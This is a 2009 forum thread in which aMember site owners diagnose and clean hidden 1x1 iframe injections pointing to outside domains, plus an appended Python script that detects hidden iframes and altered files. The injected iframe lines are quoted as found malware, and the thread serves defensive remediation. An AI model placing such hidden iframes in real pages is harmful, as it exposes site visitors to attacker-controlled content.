Credit Card page redirects to another website

Discussion in 'Troubleshooting' started by jes_bad, Jul 10, 2009.

  1. jes_bad

    jes_bad New Member

    Joined:
    Apr 4, 2009
    Messages:
    32
    Hi All,

    I'm hoping someone can help me.

    Whenever the user enters their personal info (signup.php) and clicks continue, for some reason when the user is on the cc.php (amember/plugins/payment/cc_core/cc.php) page, the page redirects to some other URL. It's not always the same site, it seems to be a different site every time.

    Has anyone else run into this problem?? Fixes?? :confused:

    BTW, I have added the latest SecurityNote06 in the code.

    TIA,
    - Jes
  2. jes_bad

    jes_bad New Member

    Joined:
    Apr 4, 2009
    Messages:
    32
    Found something interesting on the cc.php, on the very first line, when you view the source:

    <iframe src="http://warpiln.net/?click=803E91" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

    Any clues of how to remove this?? This is something I did NOT implement myself.

    Any help is greatly appreciated.
  3. jes_bad

    jes_bad New Member

    Joined:
    Apr 4, 2009
    Messages:
    32
    Update:

    I found the iframe code in the footer.html page in the amember/templates folder.

    <iframe src="http://warpiln.net/?click=803E91" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

    I removed it and FTP'd it back over. I still, however, see it being referenced when looking at the source on the cc.php page.

    I ftp'd all of the amember/template files onto my local machine. I used notepad++ to Search in Files to detect "iframe src="http://warpiln", but it did not find any further references from any files within the template folder.

    Any ideas anyone? I have submitted a ticket for this, but any help would be greatly appreciated.

    - Jes
  4. davidm1

    davidm1 aMember User & Partner

    Joined:
    May 16, 2006
    Messages:
    4,437
    You got the iframe virus.
    You need to remove it from your home computer and server!

    David
  5. jes_bad

    jes_bad New Member

    Joined:
    Apr 4, 2009
    Messages:
    32
    Thanks for the info David! I am running a virus check on my computer. I will inform GoDaddy of the issue as well.

    Thanks,
    - Jes
  6. skippybosco

    skippybosco CGI-Central Partner Staff Member

    Joined:
    Aug 22, 2006
    Messages:
    2,526
    Once your virus scan is complete you should consider changing all of your various passwords as well (especially your FTP, CPanel, etc.).
  7. jes_bad

    jes_bad New Member

    Joined:
    Apr 4, 2009
    Messages:
    32
    Hello,

    I am in dire straits!! I have contacted GoDaddy and reported the issue. Their Advanced support response is that "my FTP credentials have been compromised and to change my passwords". That has been done. GoDaddy cannot confirm with me that their site has been hit with this virus or that they have checked on their servers at all, and has put the onus on me to figure this issue out.

    I have FTPd locally ALL files contained on my domain. I have used Notepad++ to search every single line of code for ALL files from my domain (Search > Find in Files...). I cannot find ANY reference to this IFRAME issue within them.

    I cannot figure out what else to do! I am at my wits' end! This is very critical to get this resolved in order for me to go live with my site.

    I am at the point where I am willing to pay someone to help me fix/resolve this issue!

    Can someone help me?

    Thanks,
    -Jes
  8. skippybosco

    skippybosco CGI-Central Partner Staff Member

    Joined:
    Aug 22, 2006
    Messages:
    2,526
    Jes, I can help you get this sorted server side (free of charge). Drop me an email [my username here @ hotmail.com]
  9. jes_bad

    jes_bad New Member

    Joined:
    Apr 4, 2009
    Messages:
    32
    Thanks Skippy!

    Skippy, please check your email.

    Thanks!
    - Jes
  10. skippybosco

    skippybosco CGI-Central Partner Staff Member

    Joined:
    Aug 22, 2006
    Messages:
    2,526
    FYI, for those that run into this issue.. among the other reported places, it tries to hide itself in:

    \amember\smarty\plugins\modifier.default.php

    Either edit out the change or revert back to the stock version.
  11. jes_bad

    jes_bad New Member

    Joined:
    Apr 4, 2009
    Messages:
    32
    Thank you!

    First off, I cannot begin to thank Skippy enough! :D:D

    You are a blessing my friend! Thanks for your help!

    Here is a list of the files that were infected in my site:

    Code:
    ../wp-admin/index.php
        iframe src=\"http://warpiln.net/?click=859E9A\" width=1 height=1 style=\"visibility:hidden;position:absolute\">";
    ../amember/plugins/protect_trial/event_registration/index.php
        iframe src=\"http://warpiln.net/?click=513A7E\" width=1 height=1 style=\"visibility:hidden;position:absolute\">";
        iframe src=\"http://internetcountercheck.com/?click=2539171\" width=1 height=1 style=\"visibility:hidden;position:absolute\">";
    ../amember/plugins/protect_trial/incremental_content/index.php
        iframe src=\"http://warpiln.net/?click=6EA33E\" width=1 height=1 style=\"visibility:hidden;position:absolute\">";
    ../amember/plugins/protect_trial/memberslist/index.php
        iframe src=\"http://warpiln.net/?click=70E946\" width=1 height=1 style=\"visibility:hidden;position:absolute\">";
    ../amember/xmlrpc/index.php
        iframe src=\"http://warpiln.net/?click=8268A4\" width=1 height=1 style=\"visibility:hidden;position:absolute\">";
    ../amember/plugins/protect_trial/memberslist/templates/memberslist/index.html
        iframe src="http://warpiln.net/?click=716711" width=1 height=1 style="visibility:hidden;position:absolute">

    ../amember/smarty/plugins/modifier.default.php file
    I am attaching a script that can be used to detect the Iframe tag within the files, with the exception of the "/amember/smarty/plugins/modifier.default.php" reference.

    Usage:
    http://www.yourdomain.com/find.php?s=index.php&c=iframe
    http://www.voteonmesports.com/find.php?s=index.html&c=iframe

    Change s= or c= as needed.
    Please check your sites, as Google is systematically marking the pages as Unsafe.

    I found someone offering a script to help remove the references in your files (although it did not find it in the modifier.default.php file).
    http://www.yourjoomlapro.com/

    Instructions and files are available on that site.

    I just want to say thanks again to Skippy, and I hope that this information can be of benefit to someone.

    - Jes
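
An added example, not part of any post in this thread and not the attached find.php or aMember's own code: a string search for "iframe" missed the change in modifier.default.php, so this sketch pairs a hidden-iframe scan (plain and backslash-escaped forms) with a byte-for-byte comparison against a clean copy of the same release. It assumes `live` is the site as downloaded over FTP and `stock` is an unpacked clean copy; the function names, the sample tree in `demo()` and the `example.invalid` URL are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
# Concealment markers from the thread: 1x1 (or 0) size, visibility:hidden.
# \\? tolerates the backslash-escaped quotes of an iframe inside a PHP string.
HIDDEN = re.compile(r"visibility\s*:\s*hidden|\b(?:width|height)=\\?[\"']?[01]\b", re.I)
SRC = re.compile(r"src=\\?[\"']?([^\s\"'\\>]+)", re.I)
WEB_EXT = {".php", ".html", ".htm", ".tpl", ".js"}


def hidden_iframes(text):
    """Return the src of every iframe sized or styled to be invisible."""
    tags = [t for t in IFRAME_TAG.findall(text) if HIDDEN.search(t)]
    return [m.group(1) if (m := SRC.search(t)) else "(no src)" for t in tags]


def audit(live, stock):
    """Scan the downloaded site and compare each file with the clean copy."""
    report = {"iframes": {}, "modified": [], "not_in_stock": []}
    for path in sorted(Path(live).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in WEB_EXT:
            continue
        rel = path.relative_to(live).as_posix()
        hits = hidden_iframes(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report["iframes"][rel] = hits
        clean = Path(stock, rel)
        if not clean.is_file():
            report["not_in_stock"].append(rel)    # file the vendor never shipped
        elif clean.read_bytes() != path.read_bytes():
            report["modified"].append(rel)        # differs even with no iframe text
    return report


def demo():
    """Constructed sample: one echoed iframe, one edit containing no iframe text."""
    tag = '<iframe src=\\"http://example.invalid/?c=0\\" width=1 height=1>'
    trees = {"stock/footer.html": "<p>x</p>", "live/footer.html": tag + "<p>x</p>",
             "stock/plugins/modifier.default.php": "<?php // stock stand-in",
             "live/plugins/modifier.default.php": "<?php // stand-in, altered",
             "live/extra.php": "<?php // not part of the clean copy"}
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in trees.items():
            Path(tmp, rel).parent.mkdir(parents=True, exist_ok=True)
            Path(tmp, rel).write_text(body, encoding="utf-8")
        return audit(Path(tmp, "live"), Path(tmp, "stock"))
```

Files you customised on purpose (templates, config) will also appear under `modified`; review those by hand and restore the rest from the clean copy.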
  12. skippybosco

    skippybosco CGI-Central Partner Staff Member

    Joined:
    Aug 22, 2006
    Messages:
    2,526
    @jes_bad: Glad to hear you are up and running, do something great with the site!
  13. starstruck

    starstruck New Member

    Joined:
    Oct 28, 2007
    Messages:
    7
    Thanks for the replies guys, found this on Google as I am experiencing the same problems. I ran that find.php and it's found a few more instances of iframes I didn't realise I had. I've cleaned them all now.

    I'm more worried how I got this in the first place. I've removed the iframes and changed my ftp, amember, and wordpress passwords. Any suggestions as to how we got infected, or how to protect against it again?

    thanks
    ________
    easyvape vaporizer
  14. skippybosco

    skippybosco CGI-Central Partner Staff Member

    Joined:
    Aug 22, 2006
    Messages:
    2,526
    @starstruck: either your computer, your FTP account or your server was compromised.

    1) Computer: Scan with antivirus / malware any computers you have accessed your administrative side of your site from

    2) FTP: change your FTP account info

    3) Server: Contact your host. Also have you uploaded any sketchy scripts to your server that may have an unwanted "payload".. I had a client that was using a copy of vBulletin he got from ThePirateBay that resulted in all of the scripts on his site being infected in a similar way. Unless you have security locked down, PHP code executed on your server can modify other scripts on your server.
